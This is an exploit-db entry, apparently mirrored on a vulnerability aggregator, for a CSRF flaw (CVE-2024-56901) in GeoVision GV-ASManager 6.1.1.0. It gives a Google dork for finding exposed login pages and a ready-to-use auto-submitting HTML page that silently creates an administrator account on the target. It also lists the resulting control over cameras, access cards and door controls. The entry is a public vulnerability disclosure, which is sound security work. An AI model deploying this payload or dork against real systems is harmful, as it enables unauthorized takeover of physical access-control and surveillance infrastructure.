GeoVision GV-ASManager 6.1.1.0 - CSRF

🗓️ 11 Apr 2025 00:00:00Reported by Giorgi DograshviliType

exploitdb🔗 www.exploit-db.com👁 272 Views

CSRF vulnerability in GeoVision GV-ASManager 6.1.1.0 allows arbitrary Admin account creation via GET request.

Reporter	Title	Published	Views	Family All 17
Circl	CVE-2024-56901	2 Feb 202522:00	–	circl
Circl	CVE-2024-56903	2 Feb 202522:00	–	circl
CNNVD	Geovision GV-ASWeb 安全漏洞	3 Feb 202500:00	–	cnnvd
CNNVD	Geovision GV-ASWeb 安全漏洞	3 Feb 202500:00	–	cnnvd
CVE	CVE-2024-56901	3 Feb 202500:00	–	cve
CVE	CVE-2024-56903	3 Feb 202500:00	–	cve
Cvelist	CVE-2024-56901	3 Feb 202500:00	–	cvelist
Cvelist	CVE-2024-56903	3 Feb 202500:00	–	cvelist
EUVD	EUVD-2024-53445	3 Oct 202520:07	–	euvd
EUVD	EUVD-2024-53447	3 Oct 202520:07	–	euvd

# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF 
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901

A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.


The CSRF code:

<html>
  <body>
    <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf">				# Set the target
      <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
      <input type="hidden" name="id" value="Malicious" /> 					# Set Username
      <input type="hidden" name="password" value="Youarecracked999&#33;" />			# Set Password
      <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" />	# Set Email
      <input type="hidden" name="level" value="2" />						# Set privilege 1-Normal user 2-Administrator
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management 
- TAWeb	- Time and Attendance Management 
- VMWeb	- Visitor Management 
- ASManager - Access & Security Management software in OS

11 Apr 2025 00:00Current

8.8High risk

Vulners AI Score8.8

CVSS 3.18.8

EPSS0.00666

SSVC